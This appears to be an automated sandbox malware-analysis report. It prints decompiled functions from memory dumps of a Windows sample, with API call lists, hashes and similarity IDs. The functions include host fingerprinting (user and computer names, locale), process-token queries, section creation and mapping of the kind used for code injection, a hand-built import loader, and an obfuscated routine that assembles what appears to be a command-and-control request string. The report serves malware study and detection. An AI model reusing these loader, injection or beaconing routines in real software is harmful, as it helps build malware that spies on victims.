0x00fc39c2
0x00fc39c2
0x00fc399a
0x00fc3988
0x00fc39d9
0x00fc39df
0x00fc39e9
0x00fc39eb
0x00fc39f0
0x00fc39ff
0x00fc3a03
0x00fc3a0e
0x00fc3a15
0x00fc3a1c
0x00fc3a1c
0x00fc3a28
0x00fc3a28
0x00fc3a03
0x00fc3a31
0x00fc3a33
0x00fc3a36
0x00fc3a38
0x00fc3a3b
0x00fc3a3e
0x00fc3a48
0x00fc3a4c
0x00fc3a50

APIs

GetUserNameW.ADVAPI32(00000000,00FC2F3F), ref: 00FC397D
RtlAllocateHeap.NTDLL(00000000,00FC2F3F), ref: 00FC3994
GetUserNameW.ADVAPI32(00000000,00FC2F3F), ref: 00FC39A1
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FC2F3F,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC39C2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FC39E9
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FC39FD
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FC3A0A
HeapFree.KERNEL32(00000000,00000000), ref: 00FC3A28

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 4f308fa49c3541904890b3da6df02af60f4394b158edda1798051dd5389206e2
Instruction ID: 31516a7a494b8bf9d55e4f62a90c0432d15af7a012d56a3cc021fcccb1216647
Opcode Fuzzy Hash: 4f308fa49c3541904890b3da6df02af60f4394b158edda1798051dd5389206e2
Instruction Fuzzy Hash: EF310971A0020AEFDB11DFA9DE86FAEB7F9EB48754F108429E545D3210D771AE04AB10

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00FC3CA1(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00FC5C4E(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00FC2A03(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00fc3cae
0x00fc3caf
0x00fc3cb0
0x00fc3cb1
0x00fc3cb2
0x00fc3cb6
0x00fc3cbd
0x00fc3ccc
0x00fc3ccf
0x00fc3cd2
0x00fc3cd9
0x00fc3cdc
0x00fc3cdf
0x00fc3ce2
0x00fc3ce5
0x00fc3cf0
0x00fc3cf2
0x00fc3cfb
0x00fc3d03
0x00fc3d05
0x00fc3d17
0x00fc3d21
0x00fc3d25
0x00fc3d34
0x00fc3d38
0x00fc3d41
0x00fc3d49
0x00fc3d49
0x00fc3d4b
0x00fc3d4b
0x00fc3d53
0x00fc3d59
0x00fc3d5d
0x00fc3d5d
0x00fc3d68

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00FC3CE8
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00FC3CFB
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FC3D17

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FC3D34
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00FC3D41
NtClose.NTDLL(00000000), ref: 00FC3D53
NtClose.NTDLL(00000000), ref: 00FC3D5D

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 4a56dad192376c8c9797a0deb456fefd994f0796338b3f61d2eebd7d9a7bb824
Instruction ID: 615ed8d018170fb1264658a0345d86653884d7cd68a2b3c0ea06dcdbaedb4b76
Opcode Fuzzy Hash: 4a56dad192376c8c9797a0deb456fefd994f0796338b3f61d2eebd7d9a7bb824
Instruction Fuzzy Hash: 702107B290021DBBDB019F95CD4AEDEBFBDFB08740F104016F901E6120D7B59A44ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0518D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E0518D1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E051B89(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e0518da
0x6e0518e1
0x6e0518e2
0x6e0518e3
0x6e0518e4
0x6e0518e5
0x6e0518f6
0x6e0518fa
0x6e05190e
0x6e051911
0x6e051914
0x6e05191b
0x6e05191e
0x6e051925
0x6e051928
0x6e05192b
0x6e05192e
0x6e051933
0x6e05196e
0x6e051935
0x6e051938
0x6e05193e
0x6e051943
0x6e051947
0x6e051965
0x6e051949
0x6e051950
0x6e05195e
0x6e05195e
0x6e051947
0x6e051976

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6E05192E

Part of subcall function 6E051B89: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E051943,00000002,00000000,?,?,00000000,?,?,6E051943,00000000), ref: 6E051BB6

memset.NTDLL ref: 6E051950

Strings

@, xrefs: 6E05191E

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction ID: 4068907e4665e92758692dde8dee57a7983b644cc90d518faf290848c2be52b7
Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction Fuzzy Hash: 3A210BB1D00609EFDB01CFE9C884ADEFBB9EF48354F508429E505F3210D730AA588BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E051566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E051566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6e05156a
0x6e05157b
0x6e051583
0x6e051585
0x6e051598
0x6e051598
0x6e0515a2

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E05157B
GetSystemDefaultUILanguage.KERNEL32(?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051598

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 27c2a0a0a1e0281b0c74014c6bf814840f39e2f0b9c9c23a7a81d5b8878b7861
Instruction ID: de5faab829ae3d30bad3af8dc5aa8a4f7bafe5a72591d950d2fdc314551fc97e
Opcode Fuzzy Hash: 27c2a0a0a1e0281b0c74014c6bf814840f39e2f0b9c9c23a7a81d5b8878b7861
Instruction Fuzzy Hash: 0DE04878640704F6E700DBD1DD0AFBD73BC970474AF500044F701D61C0D6749A08D725

Uniqueness

Uniqueness Score: -1.00%

Function 6E051F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E051F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e0541cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e051f31
0x6e051f3a
0x6e051f3f
0x6e051f45
0x6e051f4e
0x6e051f54
0x6e051f56
0x6e051f59
0x6e051f5e
0x6e051f65
0x6e051f65
0x6e051f69
0x6e051f71
0x6e051f74
0x00000000
0x00000000
0x6e051f7a
0x6e051f84
0x6e051f86
0x6e051f89
0x6e051f8c
0x6e051f90
0x6e051f98
0x6e051f9a
0x6e051f9d
0x6e052005
0x6e052005
0x6e052009
0x00000000
0x00000000
0x6e051fa2
0x6e051fa8
0x6e051faa
0x6e051fbd
0x6e051fc0
0x6e051fc0
0x6e051fc0
0x6e051fc4
0x6e051fac
0x6e051fac
0x6e051fb4
0x6e051fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e051fb6
0x6e051fa4
0x6e051fa4
0x6e051fb8
0x6e051fb8
0x6e051fb8
0x6e051fc7
0x6e051fca
0x6e051fcc
0x6e051fd3
0x6e051fce
0x6e051fce
0x6e051fce
0x6e051fdb
0x6e051fe1
0x6e051fe3
0x6e052013
0x6e051fe5
0x6e051fe5
0x6e051fe8
0x6e051fea
0x6e051ff2
0x6e051ff2
0x6e051ff7
0x6e051ff9
0x6e052000
0x6e052002
0x6e052002
0x6e052002
0x00000000
0x6e052002
0x00000000
0x6e051fe3
0x6e051f92
0x6e051f94
0x6e051f96
0x00000000
0x00000000
0x6e051f96
0x6e052016
0x6e052016
0x6e05201d
0x6e052022
0x00000000
0x00000000
0x6e052028
0x6e052033
0x00000000
0x6e052033
0x6e05202a
0x6e05202a
0x6e052030
0x00000000
0x6e052030
0x6e051f5e
0x6e052034
0x6e052039

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E051F69
GetProcAddress.KERNEL32(?,00000000), ref: 6E051FDB

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: a8faca7362876f8f6badb9cd5f3c06ee17d4735f7c186e44d87197511c974449
Instruction ID: 247a33f3aa2b283abb733da0036396871d792ef1f23ab563205e53c8ac8a547d
Opcode Fuzzy Hash: a8faca7362876f8f6badb9cd5f3c06ee17d4735f7c186e44d87197511c974449
Instruction Fuzzy Hash: AB313471A0120ADFEB44CF99CA84BAEB7F4BF09344B104069D811E7341E774DA64CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E051B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E051B89(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e051b9b
0x6e051ba1
0x6e051baf
0x6e051bb6
0x6e051bbb
0x6e051bc1
0x00000000
0x6e051bc2
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E051943,00000002,00000000,?,?,00000000,?,?,6E051943,00000000), ref: 6E051BB6

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: b8043cd67e4f7375274e169b54344a73b6dc827e4867957181891c157c15ac2c
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: DAF012B590060DFFEB119FA5CC89D9FBBFDEB44354B104939B552E2190E6309E189B60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6DB7, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 263
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00FC6DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t112;
				signed int _t116;
				char** _t118;
				int _t121;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t133;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t140;
				int _t143;
				void* _t144;
				void* _t145;
				void* _t155;
				int _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				void* _t164;
				long _t168;
				intOrPtr* _t169;
				intOrPtr* _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t181;

				_t155 = __edx;
				_t145 = __ecx;
				_t63 = __eax;
				_t144 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xfca018; // 0x785c6176
				asm("bswap eax");
				_t65 =  *0xfca014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xfca010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xfca00c; // 0x67522d90
				asm("bswap eax");
				_t68 =  *0xfca2d0; // 0x292d5a8
				_t3 = _t68 + 0xfcb622; // 0x74666f73
				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0xfca02c,  *0xfca004, _t63);
				_t71 = E00FC271A();
				_t72 =  *0xfca2d0; // 0x292d5a8
				_t4 = _t72 + 0xfcb662; // 0x74707526
				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
				_t175 = _t173 + 0x38;
				_t159 = _t158 + _t75;
				if(_a8 != 0) {
					_t140 =  *0xfca2d0; // 0x292d5a8
					_t8 = _t140 + 0xfcb66d; // 0x732526
					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
					_t175 = _t175 + 0xc;
					_t159 = _t159 + _t143;
				}
				_t76 = E00FC2956(_t145);
				_t77 =  *0xfca2d0; // 0x292d5a8
				_t10 = _t77 + 0xfcb38a; // 0x6d697426
				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
				_t81 =  *0xfca2d0; // 0x292d5a8
				_t12 = _t81 + 0xfcb7b4; // 0x38f8d5c
				_t181 = _a4 - _t12;
				_t14 = _t81 + 0xfcb33b; // 0x74636126
				_t157 = 0 | _t181 == 0x00000000;
				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
				_t85 =  *0xfca318; // 0x38f95e0
				_t176 = _t175 + 0x1c;
				if(_t85 != 0) {
					_t136 =  *0xfca2d0; // 0x292d5a8
					_t18 = _t136 + 0xfcb8ea; // 0x3d736f26
					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
					_t176 = _t176 + 0xc;
					_t161 = _t161 + _t139;
				}
				_t86 =  *0xfca328; // 0x38f95b0
				if(_t86 != 0) {
					_t133 =  *0xfca2d0; // 0x292d5a8
					_t20 = _t133 + 0xfcb685; // 0x73797326
					wsprintfA(_t161 + _t144, _t20, _t86);
					_t176 = _t176 + 0xc;
				}
				_t162 =  *0xfca37c; // 0x38f9630
				_t88 = E00FC5741(0xfca00a, _t162 + 4);
				_t168 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0xfca290, _t168, _t144); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xfca290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xfca290, _t168, _v12);
						goto L28;
					}
					E00FC1A51(GetTickCount());
					_t95 =  *0xfca37c; // 0x38f9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xfca37c; // 0x38f9630
					__imp__(_t99 + 0x40);
					_t101 =  *0xfca37c; // 0x38f9630
					_t102 = E00FC5AE3(1, _t157, _t144,  *_t101); // executed
					_t164 = _t102;
					_v20 = _t164;
					asm("lock xadd [eax], ecx");
					if(_t164 == 0) {
						L26:
						RtlFreeHeap( *0xfca290, _t168, _a8); // executed
						goto L27;
					}
					StrTrimA(_t164, 0xfc92cc);
					_push(_t164);
					_t107 = E00FC2829();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						RtlFreeHeap( *0xfca290, _t168, _t164); // executed
						goto L26;
					}
					 *_t164 = 0;
					__imp__(_a8, _v12);
					_t169 = __imp__;
					 *_t169(_a8, _v8);
					 *_t169(_a8, _t164);
					_t112 = E00FC33FA(0, _a8);
					_a4 = _t112;
					if(_t112 == 0) {
						_a20 = 8;
						L23:
						E00FC2813();
						L24:
						RtlFreeHeap( *0xfca290, 0, _v8); // executed
						_t168 = 0;
						goto L25;
					}
					_t116 = E00FC5C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
					_a20 = _t116;
					if(_t116 == 0) {
						_t172 = _v16;
						_t123 = E00FC1671(_t172, _a4, _a12, _a16); // executed
						_a20 = _t123;
						_t124 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
						_t126 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t126 + 8))(_t126);
						_t128 =  *((intOrPtr*)(_t172 + 4));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *_t172;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						E00FC2A03(_t172);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t118 = _a12;
							if(_t118 != 0) {
								_t165 =  *_t118;
								_t170 =  *_a16;
								wcstombs( *_t118,  *_t118,  *_a16);
								_t121 = E00FC6459(_t165, _t165, _t170 >> 1);
								_t164 = _v20;
								 *_a16 = _t121;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00FC2A03(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00fc6db7
0x00fc6db7
0x00fc6db7
0x00fc6dc0
0x00fc6dc5
0x00fc6dcc
0x00fc6dce
0x00fc6dce
0x00fc6ddb
0x00fc6de6
0x00fc6de9
0x00fc6df4
0x00fc6df7
0x00fc6dfc
0x00fc6dff
0x00fc6e04
0x00fc6e07
0x00fc6e13
0x00fc6e20
0x00fc6e22
0x00fc6e28
0x00fc6e2d
0x00fc6e38
0x00fc6e3a
0x00fc6e3d
0x00fc6e43
0x00fc6e45
0x00fc6e4d
0x00fc6e58
0x00fc6e5a
0x00fc6e5d
0x00fc6e5d
0x00fc6e5f
0x00fc6e66
0x00fc6e6b
0x00fc6e78
0x00fc6e7a
0x00fc6e7f
0x00fc6e87
0x00fc6e8a
0x00fc6e90
0x00fc6e9b
0x00fc6e9d
0x00fc6ea2
0x00fc6ea7
0x00fc6eaa
0x00fc6eaf
0x00fc6eba
0x00fc6ebc
0x00fc6ebf
0x00fc6ebf
0x00fc6ec1
0x00fc6ec8
0x00fc6ecb
0x00fc6ed0
0x00fc6eda
0x00fc6edc
0x00fc6edc
0x00fc6edf
0x00fc6eed
0x00fc6ef2
0x00fc6ef6
0x00fc6ef9
0x00fc70c5
0x00fc70cd
0x00fc70da
0x00fc6eff
0x00fc6f0b
0x00fc6f13
0x00fc6f16
0x00fc70b5
0x00fc70bf
0x00000000
0x00fc70bf
0x00fc6f22
0x00fc6f27
0x00fc6f30
0x00fc6f41
0x00fc6f45
0x00fc6f4e
0x00fc6f54
0x00fc6f5c
0x00fc6f61
0x00fc6f68
0x00fc6f71
0x00fc6f77
0x00fc70a5
0x00fc70af
0x00000000
0x00fc70af
0x00fc6f83
0x00fc6f89
0x00fc6f8a
0x00fc6f91
0x00fc6f94
0x00fc7097
0x00fc709f
0x00000000
0x00fc709f
0x00fc6f9d
0x00fc6fa3
0x00fc6fac
0x00fc6fb5
0x00fc6fbb
0x00fc6fc2
0x00fc6fc9
0x00fc6fcc
0x00fc70dd
0x00fc707f
0x00fc707f
0x00fc7084
0x00fc708f
0x00fc7095
0x00000000
0x00fc7095
0x00fc6fd6
0x00fc6fdd
0x00fc6fe0
0x00fc6fe5
0x00fc6ff0
0x00fc6ff5
0x00fc6ff8
0x00fc6ffe
0x00fc7004
0x00fc700a
0x00fc700d
0x00fc7013
0x00fc7016
0x00fc701b
0x00fc701f
0x00fc701f
0x00fc702b
0x00fc7037
0x00fc703b
0x00fc703d
0x00fc7042
0x00fc7044
0x00fc7049
0x00fc704e
0x00fc705b
0x00fc7063
0x00fc7066
0x00fc7066
0x00fc7042
0x00000000
0x00fc702d
0x00fc7031
0x00fc7068
0x00fc706b
0x00fc7074
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc7074
0x00fc7033
0x00000000
0x00fc7033
0x00fc702b

APIs

GetTickCount.KERNEL32 ref: 00FC6DCE
wsprintfA.USER32 ref: 00FC6E1B
wsprintfA.USER32 ref: 00FC6E38
wsprintfA.USER32 ref: 00FC6E58
wsprintfA.USER32 ref: 00FC6E76
wsprintfA.USER32 ref: 00FC6E99
wsprintfA.USER32 ref: 00FC6EBA
wsprintfA.USER32 ref: 00FC6EDA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FC6F0B
GetTickCount.KERNEL32 ref: 00FC6F1C
RtlEnterCriticalSection.NTDLL(038F95F0), ref: 00FC6F30
RtlLeaveCriticalSection.NTDLL(038F95F0), ref: 00FC6F4E

Part of subcall function 00FC5AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B0E
Part of subcall function 00FC5AE3: lstrlen.KERNEL32(00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B16
Part of subcall function 00FC5AE3: strcpy.NTDLL ref: 00FC5B2D
Part of subcall function 00FC5AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00FC5B38
Part of subcall function 00FC5AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B55

